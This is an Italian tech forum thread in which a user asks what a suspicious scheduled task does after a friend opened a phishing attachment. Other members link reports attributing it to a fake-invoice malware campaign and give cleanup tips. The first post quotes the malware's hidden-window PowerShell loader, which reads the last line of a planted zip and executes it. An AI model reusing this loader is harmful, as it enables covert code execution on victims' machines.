Torna indietro   Hardware Upgrade Forum > Software > Microsoft Windows > Microsoft Windows 7 e Vista

Cineca inaugura Pitagora, il supercomputer Lenovo per la ricerca sulla fusione nucleare
Cineca inaugura Pitagora, il supercomputer Lenovo per la ricerca sulla fusione nucleare
Realizzato da Lenovo e installato presso il Cineca di Casalecchio di Reno, Pitagora offre circa 44 PFlop/s di potenza di calcolo ed è dedicato alla simulazione della fisica del plasma e allo studio dei materiali avanzati per la fusione, integrandosi nell’ecosistema del Tecnopolo di Bologna come infrastruttura strategica finanziata da EUROfusion e gestita in collaborazione con ENEA
Mova Z60 Ultra Roller Complete: pulisce bene grazie anche all'IA
Mova Z60 Ultra Roller Complete: pulisce bene grazie anche all'IA
Rullo di lavaggio dei pavimenti abbinato a un potente motore da 28.000 Pa e a bracci esterni che si estendono: queste, e molte altre, le caratteristiche tecniche di Z60 Ultra Roller Complete, l'ultimo robot di Mova che pulisce secondo le nostre preferenze oppure lasciando far tutto alla ricca logica di intelligenza artificiale integrata
Renault Twingo E-Tech Electric: che prezzo!
Renault Twingo E-Tech Electric: che prezzo!
Renault annuncia la nuova vettura compatta del segmento A, che strizza l'occhio alla tradizione del modello abbinandovi una motorizzazione completamente elettrica e caratteristiche ideali per i tragitti urbani. Renault Twingo E-Tech Electric punta su abitabilità, per una lunghezza di meno di 3,8 metri, abbinata a un prezzo di lancio senza incentivi di 20.000€
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 18-02-2019, 21:06   #1
winoni71
Senior Member
 
L'Avatar di winoni71
 
Iscritto dal: Jul 2007
Messaggi: 997
Powershell

Buonasera, un'amica mi ha interpellato perchè da giorni, dopo che aveva aperto un allegato di una mail sospetta, ogni 5 minuti le compariva una finestra di "taskeng.exe" completamente nera.

Ho provato a controllare se ci fossero degli eventi pianificati strani e ne ho effettivamente trovato uno, che ho subito eliminato, che si attivava ogni 5 minuti e che aveva questa stringa powershell:
-ep byPass -w hi""DDen -c &{cd c:\users\;$j=dir -force -r -in aggior*.zip|select -last 1;$r2=cat -LiteralPat $j.fullname;$r2[$r2.length-1]|iex}

Sapete dirmi che cosa facesse esattamente?

Grazie.
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2
winoni71 è offline   Rispondi citando il messaggio o parte di esso
Old 19-02-2019, 12:05   #2
tallines
Senior Member
 
L'Avatar di tallines
 
Iscritto dal: Feb 2009
Messaggi: 50674
Ciao, Cosa facesse, non lo so, ma se è uscita da una e-mail.............non credo che facesse del bene, anzi.........

Hai fatto bene a eliminarla .

Bisogna fare attenzione, quando si aprono le e-mail .

Se il problema continua, io salverei i dati e reinstallerei il SO da zero .

Volendo si possono fare degli scan antivirus e anti-malware .

Visto che hai W7, anche con Combofix, da provvisoria .
tallines è offline   Rispondi citando il messaggio o parte di esso
Old 19-02-2019, 14:13   #3
winoni71
Senior Member
 
L'Avatar di winoni71
 
Iscritto dal: Jul 2007
Messaggi: 997
Quote:
Originariamente inviato da tallines Guarda i messaggi
.Volendo si possono fare degli scan antivirus e anti-malware .
Fatto sia con MSE che Malawarebytes, zero rilevazioni.
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2
winoni71 è offline   Rispondi citando il messaggio o parte di esso
Old 19-02-2019, 17:54   #4
tallines
Senior Member
 
L'Avatar di tallines
 
Iscritto dal: Feb 2009
Messaggi: 50674
Quote:
Originariamente inviato da winoni71 Guarda i messaggi
Fatto sia con MSE che Malawarebytes, zero rilevazioni.
Allora sei a posto .

Però un giro con Combofix e con AdwCleaner, io lo farei
tallines è offline   Rispondi citando il messaggio o parte di esso
Old 22-02-2019, 09:27   #5
Dane
Senior Member
 
L'Avatar di Dane
 
Iscritto dal: Jun 2001
Città: Gorizia/Trieste/Slovenia
Messaggi: 4338
potrebbe essere più o meno questo:

https://blog.yoroi.company/research/...ding-to-italy/
__________________
Dio ha fatto il cavo, il diavolo il wireless.

"CCIE-level challenges should stay in CCIE labs." (cit I.Pepelnjak)
Dane è offline   Rispondi citando il messaggio o parte di esso
Old 22-02-2019, 12:28   #6
winoni71
Senior Member
 
L'Avatar di winoni71
 
Iscritto dal: Jul 2007
Messaggi: 997
Quote:
Originariamente inviato da Dane Guarda i messaggi
potrebbe essere più o meno questo:

https://blog.yoroi.company/research/...ding-to-italy/
Si, è esattamente quello, la mail era proprio relativa ad una (falsa) fattura elettronica.
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2
winoni71 è offline   Rispondi citando il messaggio o parte di esso
Old 04-03-2019, 16:15   #7
Matteo_76
Senior Member
 
Iscritto dal: Apr 2011
Messaggi: 357
In https://www.cert-pa.it/notizie/campa...-script-sload/ - Computer Emergency Response Team Pubblica Amministrazione (CERT-PA) all'interno di AgID - la traduzione in italiano. Se in passato era utilizzato per diffondere malware come Ramnit banker forse adesso viene utilizzato per diffonderne di nuovi!
Come giustamente ha detto tallines bisogna stare attentissimi allemail. Sopratutto non aprire allegati sospetti e, per me, essendo windows per sicurezza acquistare un buon antivirus.
__________________
Diffidate da chi dispensa certezze: TUTTI possono sbagliare! - Tutto quello che dico è IMHO (nessuna garanzia )
Matteo_76 è offline   Rispondi citando il messaggio o parte di esso
Old 10-03-2019, 10:48   #8
Eress
Senior Member
 
L'Avatar di Eress
 
Iscritto dal: Jan 2010
Messaggi: 37091
Di questi tempi, mai aprire allegati se non da utenti sicuri al 100%. Ma la regola sarebbe di non aprirli mai.
__________________
Analemma - Slowdive - Facebook
Motto Microsoft: "If it's broken, and I'm the one who broke it, don't fix it!"
Eress è offline   Rispondi citando il messaggio o parte di esso
Old 10-03-2019, 15:21   #9
winoni71
Senior Member
 
L'Avatar di winoni71
 
Iscritto dal: Jul 2007
Messaggi: 997
Quote:
Originariamente inviato da Eress Guarda i messaggi
Ma la regola sarebbe di non aprirli mai.
In che senso "non aprirli mai"?
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2
winoni71 è offline   Rispondi citando il messaggio o parte di esso
Old 10-03-2019, 17:11   #10
tallines
Senior Member
 
L'Avatar di tallines
 
Iscritto dal: Feb 2009
Messaggi: 50674
Quote:
Originariamente inviato da winoni71 Guarda i messaggi
In che senso "non aprirli mai"?
Come apri la posta, cosa usi per la posta ?
tallines è offline   Rispondi citando il messaggio o parte di esso
Old 11-03-2019, 01:30   #11
winoni71
Senior Member
 
L'Avatar di winoni71
 
Iscritto dal: Jul 2007
Messaggi: 997
Quote:
Originariamente inviato da tallines Guarda i messaggi
Come apri la posta, cosa usi per la posta ?
Io personalmente uso Outlook (il programma).
La persona che ha ricevuto la mail in questione usa Outlook (il sito).
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2
winoni71 è offline   Rispondi citando il messaggio o parte di esso
Old 11-03-2019, 10:57   #12
tallines
Senior Member
 
L'Avatar di tallines
 
Iscritto dal: Feb 2009
Messaggi: 50674
Quote:
Originariamente inviato da winoni71 Guarda i messaggi
Io personalmente uso Outlook (il programma).
La persona che ha ricevuto la mail in questione usa Outlook (il sito).
Ottimo >

Eudora e Microsoft Outlook sono tra i provider di posta elettronica popolari che permettono di leggere una e-mail senza aprirla.
tallines è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Cineca inaugura Pitagora, il supercomputer Lenovo per la ricerca sulla fusione nucleare Cineca inaugura Pitagora, il supercomputer Lenov...
Mova Z60 Ultra Roller Complete: pulisce bene grazie anche all'IA Mova Z60 Ultra Roller Complete: pulisce bene gra...
Renault Twingo E-Tech Electric: che prezzo! Renault Twingo E-Tech Electric: che prezzo!
Il cuore digitale di F1 a Biggin Hill: l'infrastruttura Lenovo dietro la produzione media Il cuore digitale di F1 a Biggin Hill: l'infrast...
DJI Osmo Mobile 8: lo stabilizzatore per smartphone con tracking multiplo e asta telescopica DJI Osmo Mobile 8: lo stabilizzatore per smartph...
Lo compri una volta, lo giochi dove vuoi...
Qiantinuum annuncia Helios, "il com...
Samsung Galaxy S26 Ultra: una sola novit...
Google prepara Gemini 3 Pro e Nano Banan...
TVS non è solo moto e scooter: ec...
Alexa+ arriva su BMW: gli automobilisti ...
Gemini Deep Research arriva su Google Fi...
Rinvii a catena, Marvel 1943: Rise of Hy...
Xiaomi inaugura uno spazio dedicato ai f...
Rilasciate le specifiche di Bluetooth 6....
L'obiettivo che mette tutto a fuoco: la ...
Meta avrebbe raccolto fino al 10% dei ri...
NVIDIA DGX Spark e videogiochi? Una pess...
Serie Oppo Reno15 confermata: arriva il ...
UPDF 2025: l'editor PDF che fa (quasi) t...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 19:52.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v